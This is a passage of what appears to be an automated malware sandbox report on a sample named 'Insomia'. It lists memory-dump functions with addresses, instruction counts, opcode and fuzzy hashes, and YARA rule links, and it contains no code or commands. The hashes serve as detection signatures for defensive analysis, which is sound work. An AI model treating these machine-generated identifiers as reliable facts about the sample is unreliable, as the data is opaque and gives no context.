Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6409c65c9ee7d1ed991157c9b1f231aa2af9a4ffeb1510e810cc15bd70ff42f4
Instruction ID: 12dff6426c81c5234a7b1ddae02f13aa33a21f35039617c8970fb84c868b6469
Opcode Fuzzy Hash: 6409c65c9ee7d1ed991157c9b1f231aa2af9a4ffeb1510e810cc15bd70ff42f4
Instruction Fuzzy Hash: 68F0E931F482215FF71887589C147AABBABEFC8320F14447AE44A9B350DA75AC41C390

Function 016D2356 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064e86672b19cc20809466ece30420c3c30b92fb27a9979b3eeb9df9f2fd73c4
Instruction ID: 181fa088060c095ad9980a5b5a71288ad49da2ff850d63649fddb45707d43688
Opcode Fuzzy Hash: 064e86672b19cc20809466ece30420c3c30b92fb27a9979b3eeb9df9f2fd73c4
Instruction Fuzzy Hash: 6001C870E01229DFEB309F54DD69BADBAB1BB48310F1052DAD91AA6394D7714E81CF60

Function 06323C64 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a735d19305c2c2cdcf9ee37815e8b3b30d881e7ecf5a1c45db374fe25531841
Instruction ID: 55e66bb091d5a2bf35d51f01add889d843998514be91bed73af1d316f60227cf
Opcode Fuzzy Hash: 6a735d19305c2c2cdcf9ee37815e8b3b30d881e7ecf5a1c45db374fe25531841
Instruction Fuzzy Hash: 6711FA78A44228CFDB68DF58D998ADAB7B1FB48344F1040D9E409A3348DB749EC0DF91

Function 06321A5E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a510a3d3a5900284e2010864f41be5ab85ec11cb4e3c0e3d2a01b29cbaf8f1
Instruction ID: d81da526b17507733bd54036d55be036f430fa4c2d4647ae8af744b0ca83515b
Opcode Fuzzy Hash: 45a510a3d3a5900284e2010864f41be5ab85ec11cb4e3c0e3d2a01b29cbaf8f1
Instruction Fuzzy Hash: 6B11F778E05229CFCBA4CF54D988A9AB7F5EB48305F1040E9D10DA3344DB786E88CF91

Function 05EEACA8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5152e9439decd4d43632ec0bbe613ffcbe21be7d323ce8467f9d49f9e3101fb1
Instruction ID: 4abfc998ce031278cc83a95fbde42e9b3cc156c681567aa230cd8200d0100d82
Opcode Fuzzy Hash: 5152e9439decd4d43632ec0bbe613ffcbe21be7d323ce8467f9d49f9e3101fb1
Instruction Fuzzy Hash: DCF09074908288AFCB41CFA8D8446ECBFF4AB49201F04D1EAEC99E7342D3358A15DF50

Function 05E9AF09 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0923c840ed2a0e6fba7d38a7060c6d098d8b827e9b46881d6a4ad8aed9d62f9
Instruction ID: 24fe338f6d0b2351845dd260a677436974aec434149dc27f011c966352b13f39
Opcode Fuzzy Hash: c0923c840ed2a0e6fba7d38a7060c6d098d8b827e9b46881d6a4ad8aed9d62f9
Instruction Fuzzy Hash: 6601F674A092288BDB28DF69C8446E9B7F2FF89344F509069944AA7295EB345C41CF40

Function 05E9ABE6 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3091e9de6d4b12a54ede6aacfb48fe56d8fbbf4f472d493cce028b7739f937b3
Instruction ID: 0c7efa62719400c52904b95da0c30d5078e540e6ae06761c3ce69281fafe4030
Opcode Fuzzy Hash: 3091e9de6d4b12a54ede6aacfb48fe56d8fbbf4f472d493cce028b7739f937b3
Instruction Fuzzy Hash: 6601E238A00259CFDB18DFA8E894B9DBBB2FF49304F505569D446AB385CB306C80CF04

Function 060CA008 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eafa3ddf407fe46551eb9fd6b6f08bfb6fd9609140033e63e17bf262ad6c1940
Instruction ID: fe67447bb82cd4486e7ef7bdfb10a547c6bd20ee4177b4b641511dfc7ea0c54e
Opcode Fuzzy Hash: eafa3ddf407fe46551eb9fd6b6f08bfb6fd9609140033e63e17bf262ad6c1940
Instruction Fuzzy Hash: 08F0E734909248AFCF42DFA8D8405EDBFB1EB49310F14859AE959D2362D3368A62EF51

Function 05E96D90 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c903c05161fdc2fb7850c771eb57a78a025552b66990e31c5e95302f34f9f4
Instruction ID: d69657d98c48c1c1b540c87daf65dad02058c7b0066a32bafd173355fc701f7f
Opcode Fuzzy Hash: 06c903c05161fdc2fb7850c771eb57a78a025552b66990e31c5e95302f34f9f4
Instruction Fuzzy Hash: 00F0F43A404108FFCF4ADF90D944C98BFB6FB88310B158199E9481B232C332D961EB40

Function 060CA5FA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ee72f22fecf34eb713a5cb42e91c1dd883cfbfcd336b26b99ebf00dd250de8
Instruction ID: 4c1219bb263f955cd25d303a67a37f53a1d2e8a583156c655aee05bbe955b696
Opcode Fuzzy Hash: 61ee72f22fecf34eb713a5cb42e91c1dd883cfbfcd336b26b99ebf00dd250de8
Instruction Fuzzy Hash: 99E02B3198514C9FC741DBB49D0099F7FF58B42311F0055EB9505D7291FA794914D7A2

Function 05EE2FE2 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf4ded77239ddef5bcc5764c61f2ee585e46e2310c7fd4f670cfa4046b9403d
Instruction ID: 9811922b2f46d9449dfc1d789c97ec572fe3d18835762a6d16a0fbd2f916639f
Opcode Fuzzy Hash: 6bf4ded77239ddef5bcc5764c61f2ee585e46e2310c7fd4f670cfa4046b9403d
Instruction Fuzzy Hash: 9CF03A74D08208AFCB41CFA8D84099DBBB4FB49300F10C49AD84893242D7319A11DF50

Function 05E9FE60 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c42cf01edd61a25e79d4c78cd956ece42f22479a0d5ba936b0d7f8df010e241
Instruction ID: 1db0df62c2b6a275fd8c4d58c554a977a4bf3c111df2ec730637b717642ce15d
Opcode Fuzzy Hash: 3c42cf01edd61a25e79d4c78cd956ece42f22479a0d5ba936b0d7f8df010e241
Instruction Fuzzy Hash: 4CF08275E14204AFDF0ADBA4D04C39C7FA2AF80625F089699E0AAD32D1DB355685C744

Function 060C96D9 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7eeaa8de64ffd0971bdf490b97f42f67a37ae4ef5b327dc1f932bd6b24edcbb
Instruction ID: cf4bc52a28662b14361049d4a1e236a2abec95d57f545d13fad439f346800078
Opcode Fuzzy Hash: a7eeaa8de64ffd0971bdf490b97f42f67a37ae4ef5b327dc1f932bd6b24edcbb
Instruction Fuzzy Hash: B5F05E35905248EFCB41CF94D940AACBFB1FB49310F04819AE85997311E3368A62EB40

Function 060C9808 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19af4c2fd7d86b198f0af3dea4c57a01dd59762da79117ed05ad649c639379c
Instruction ID: c0f9a7395e7f801d5a0bb7389526a1353d3a702cb02b2cffd21dc8b9d2166143
Opcode Fuzzy Hash: b19af4c2fd7d86b198f0af3dea4c57a01dd59762da79117ed05ad649c639379c
Instruction Fuzzy Hash: 46F08274D09248AFD741DBA8D8506ACBFF0EB4A314F04C0DAD848D3352D6759A05DB40

Function 060C6548 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fc0cef72a8133e83d93de91848e411bc1ca681e8b39d2fda98aba1890f9615
Instruction ID: ba235d29d4f6bfbc47301d23a77649a2ab90ca782f0a293d50cfa7820f55f4a2
Opcode Fuzzy Hash: 86fc0cef72a8133e83d93de91848e411bc1ca681e8b39d2fda98aba1890f9615
Instruction Fuzzy Hash: 7AF0A770D482859FC751CBA4D8405ECBFF0EB45230F2482DAC859D7392C33A4A43CB41

Function 05EEACB8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c650d6eaa8937ffba97e8426543e2b0354f6ec985a7f38a583c12af20444ce19
Instruction ID: 6aa4a10a2a03cbbcd3b475fd24e98cb8203d07e8deb06d717be29563dd8371bb
Opcode Fuzzy Hash: c650d6eaa8937ffba97e8426543e2b0354f6ec985a7f38a583c12af20444ce19
Instruction Fuzzy Hash: 4AF01C74D04208EFCB80DFA8D944AADBBF8BB48311F14C1AAA899E3341D7359A51EF50

Function 05EE6F80 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75f109dda5425039aafc788572d73778afeb9b270e53990287f91062a827ea3b
Instruction ID: 9ea3aef0f7b72cf3d19cfb80db1f28b0f62ddaac98403aa85bc9c7abb975de4f
Opcode Fuzzy Hash: 75f109dda5425039aafc788572d73778afeb9b270e53990287f91062a827ea3b
Instruction Fuzzy Hash: 1DF0E57480D204AFCB01CFA0DC815ACBF74FB42300F1491DAD88067352C2319A16D791

Function 05EE6338 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a383d149e8d27c18916ff0fceb4ec848514edf2ecb162fea9ba7ed0608c34d9e
Instruction ID: 7978cd13b5e648ec8c6250743840a6b00f91e609f27406ac6d2c646d44da1a91
Opcode Fuzzy Hash: a383d149e8d27c18916ff0fceb4ec848514edf2ecb162fea9ba7ed0608c34d9e
Instruction Fuzzy Hash: 01F0DA71A15318CBEB14DB98D9846EEB7F6EF98204F505024D04DAB255EB309D40CB50

Function 05E996F9 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6d2689666be57a7b521861f2b22e37afbe8dcff72348ce836fefbe337ca5fa
Instruction ID: 86c1abbf8d2e7e994acd50acb93cbfcbc632f91ea80e4e7da372132bdf347064
Opcode Fuzzy Hash: ba6d2689666be57a7b521861f2b22e37afbe8dcff72348ce836fefbe337ca5fa
Instruction Fuzzy Hash: C5F01275D04208FFCB44DFA8D9456ADBBF4FB48301F10D1999845D3342D731AA55DB81

Function 05E9B169 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bae06d50b0b979e46aff713e46756e6102f139fd4a67391ca2c2b15eb4bb977
Instruction ID: a442a0c062f7f73c593aeb8d1e8736a034257cf9b6a8ea87cab3d2ff4b86cce1
Opcode Fuzzy Hash: 7bae06d50b0b979e46aff713e46756e6102f139fd4a67391ca2c2b15eb4bb977
Instruction Fuzzy Hash: E901F634A10119CFDB28DF29E985BEEBBB2FF48305F5080A9E48997740DA305D84CF10

Function 05E9ADF4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cfaf8fb0e55acc8b8cf37de1be8271aeaf827d9614a1a9995239771df629c4d
Instruction ID: 173bed5c725f5b4e2fe20629a69b9766bbbd3a79ac3593eebcc58f7cb66f826f
Opcode Fuzzy Hash: 3cfaf8fb0e55acc8b8cf37de1be8271aeaf827d9614a1a9995239771df629c4d
Instruction Fuzzy Hash: 7C01AF74A05218CFDB14DF68E899B9DBBB2FF08319F5151A5E08993251D7B46DC0CE00

Function 060CB7D9 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf35e815f5c59a7014b7af5928f48c452d3c504c5c5869fbd0a2fe26fdaa20f
Instruction ID: 4743481f9d5902917cf0a77badbcd0ce00b1a8d1c5336175ef7d5ab6e2501cc7
Opcode Fuzzy Hash: 5bf35e815f5c59a7014b7af5928f48c452d3c504c5c5869fbd0a2fe26fdaa20f
Instruction Fuzzy Hash: D0F0A030C491449FC741DBA4D9422ACBFF0AB49310F1480EAC845D7352C3394A4ACB40

Function 060CA140 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519dd1c9ba56317226f3a4d556145d69bd5e0b77d7f45f05f92d524cb9e7968d
Instruction ID: 2d645daa4e6dd194e109f57ae2b74b6a44c233e8f749ed2de490956ee85e3f3a
Opcode Fuzzy Hash: 519dd1c9ba56317226f3a4d556145d69bd5e0b77d7f45f05f92d524cb9e7968d
Instruction Fuzzy Hash: 70F0E5309492489FCB45CBA8D8104ECBFB0EB4A310F1481EED805E7342C3314A56DB51

Function 016D28B0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907a64653ed657e3be0d8867118589895482fe81f3e0b34db90215f11c6be6fe
Instruction ID: 16cb93f4f22faa735c7d18fa8be7753840cce800ef0e54246383b0d48bd42968
Opcode Fuzzy Hash: 907a64653ed657e3be0d8867118589895482fe81f3e0b34db90215f11c6be6fe
Instruction Fuzzy Hash: 43F06D2148EBC09FD32247784C2B491BF70D9172203AE10DFE8D98B1A7C51D484F8313

Function 05E9B487 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a2c6528e24ba62ccb31b0596b358ad099195e4bd33cd203723d9c2181bb9bb
Instruction ID: fbbaf92b3e8a8d5decd2f7d31b79f1ab3604c66c5be24c6e2dec73c29f0d48d4
Opcode Fuzzy Hash: 20a2c6528e24ba62ccb31b0596b358ad099195e4bd33cd203723d9c2181bb9bb
Instruction Fuzzy Hash: 98F0C974A1421ADFDB24DF64E49579DBBB1FB08304F9085A9E44A93741DB309D84DF41

Function 05E9B098 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38100498a22218279350166ea6a9f5f4808a588d8d9063dbe32c520fd518a61c
Instruction ID: a88d44ea7f12fc798994d77f3156009c8394e3da9ec756d0b8ba4a81fcdbbc0a
Opcode Fuzzy Hash: 38100498a22218279350166ea6a9f5f4808a588d8d9063dbe32c520fd518a61c
Instruction Fuzzy Hash: 80F0F274A14118CFDB18DF28E485BDDBBB2FB48308F5081A9E54AA7291CBB06D80CF41

Function 05E91018 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448e9e56fc80b01162e323474830a5ebcba40283611fb08e49cd644c52f6252a
Instruction ID: 1b0beeef980ee7382c584a150136463656a2d162d9b33a8a58848d652238b434
Opcode Fuzzy Hash: 448e9e56fc80b01162e323474830a5ebcba40283611fb08e49cd644c52f6252a
Instruction Fuzzy Hash: 02F0A730908245AFCB15CFA8C8405DCBFF1BF46310F1481DA986597392D73A4946DB41

Function 05E9B238 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40f5a0f289ffc32af613acba62d282d4fa500e16b79616d0461ce64dfd19278
Instruction ID: b3c9312d43ca0f2786e7149c77b463d0b79c59eb75629144842c5a93984a384c
Opcode Fuzzy Hash: b40f5a0f289ffc32af613acba62d282d4fa500e16b79616d0461ce64dfd19278
Instruction Fuzzy Hash: 19F0E434A04219CFDB24DF64E899BD97BB2FB44305F5091A9E049A7781EB706D80CF20

Function 05E9FE6C Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c3074063aa7bdc9316d40ed5133858a8f9a0d446725bf770f348630bbe966b
Instruction ID: 9e76fa85af51c89bfd8acd0933e8b7ee0128fa05036e381e660674f9bf101b7f
Opcode Fuzzy Hash: f9c3074063aa7bdc9316d40ed5133858a8f9a0d446725bf770f348630bbe966b
Instruction Fuzzy Hash: 25F0E531E08214AFDF0ACF69D0486DCBFB2EF80218F08809DE08AD3281CB701A85CB80

Function 05E99829 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b8667e982492def924eeb9ff51c06d732ebee6c8508456c29a282be80951970
Instruction ID: e7db5a579fc2549b8ca316cc5dbfa003eeac2bdf1407160c5de8baba263030e3
Opcode Fuzzy Hash: 7b8667e982492def924eeb9ff51c06d732ebee6c8508456c29a282be80951970
Instruction Fuzzy Hash: 2CF01C75D04208AFCB54DBA8D84179CBBF4EB49311F14C1ED9859D3381D735AA06CB41

Function 01B40134 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666473785881cb31ea9404e99032747ff4965d813efa77dbfce8b45054cc1469
Instruction ID: f94e07b59157d1a19b745167272a32a4682a7213145f424256e8ca05bba708e8
Opcode Fuzzy Hash: 666473785881cb31ea9404e99032747ff4965d813efa77dbfce8b45054cc1469
Instruction Fuzzy Hash: 29E08C7224EBD04FCB0347386C60198BF709E5320031B00EBD480EF2A3E5165D09D3E2

Function 05EE3D61 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dd27d540f33166a9fe4ce1428a3bc88ff8cbfc46104b70abc1851c16dcec601
Instruction ID: 8cad9b8f3013cf922eff34aacfcd419071f135324af98c88801e3d78b2e26665
Opcode Fuzzy Hash: 3dd27d540f33166a9fe4ce1428a3bc88ff8cbfc46104b70abc1851c16dcec601
Instruction Fuzzy Hash: E0E092B4918108DFC700DBD4DA817ECB7B1FBC9300F14E999C81963341C731AA01DB81

Function 05EE5F69 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea69f3ef6709ea4cb92f445995d1cfeaa4ae340182147d9736ca439fe9167ba7
Instruction ID: 857b94c41242d3d1e50cf1a8fd6cf0ee750913431d869bc5c0a0eba105ce3fad
Opcode Fuzzy Hash: ea69f3ef6709ea4cb92f445995d1cfeaa4ae340182147d9736ca439fe9167ba7
Instruction Fuzzy Hash: 13E02A35808208EFCB00CED4D845BECBBBAEB40305F10D2A99C0423340DB32AA26EA80

Function 05E985E0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b152002e4368bd4c0f7a35592ccf08522d6fbf873ac7fafee4625708c637fbc
Instruction ID: 682168a69e92a7ff420d0ab7cc1e8eab4f398756406fe025eaae1791b669ddc5
Opcode Fuzzy Hash: 4b152002e4368bd4c0f7a35592ccf08522d6fbf873ac7fafee4625708c637fbc
Instruction Fuzzy Hash: A8F01CB1D09248AFCB45CFA8D9402DCBBF0BB49214F1486DA88A9D73A2D7319A41DB01

Function 05E981F8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e091d1207d1f8db14fefe100ac472fb1c212cd4fa2006f4ddb5c8f882dbde15
Instruction ID: 4ba1660f43dda291137307c430b5eb9011547663f569f88e0f35352f0f37ccb8
Opcode Fuzzy Hash: 6e091d1207d1f8db14fefe100ac472fb1c212cd4fa2006f4ddb5c8f882dbde15
Instruction Fuzzy Hash: A1F01774A20218DFDB68DF68D884B99B7B2FB49344F90D095E848E3354DB745E84CF40

Function 05E98C31 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38b5b15afdba0a1294c376776792048a85e363e29a0e58799b1e7f44037ccd6
Instruction ID: 8da03a8aec1ae4c076729df97a2fe76127ae59324b7a3cae38b7420e3297416f
Opcode Fuzzy Hash: a38b5b15afdba0a1294c376776792048a85e363e29a0e58799b1e7f44037ccd6
Instruction Fuzzy Hash: 0FF05E75D09108AFCB84CF98C94069CBBF1FB49320F00C69A9868A33A1D7359A11DF40

Function 05E9FF60 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff55cb3496873232a63a9faf81a5f7c1101328961979038fbbcd3d5b61698e0
Instruction ID: d82d1f62ce1fedc3daf35f052f291ba1531242f746aa90540f079fa69f382ab9
Opcode Fuzzy Hash: 7ff55cb3496873232a63a9faf81a5f7c1101328961979038fbbcd3d5b61698e0
Instruction Fuzzy Hash: 9CF065309192849FDB45DFB8C9401DCBFF1AB4A211F1482DBC859D33D2E6318A55C711

Function 05E99F71 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7931428e5298495d3040c200f23232157fd3ed9ec5513de4ad4776220e89ed
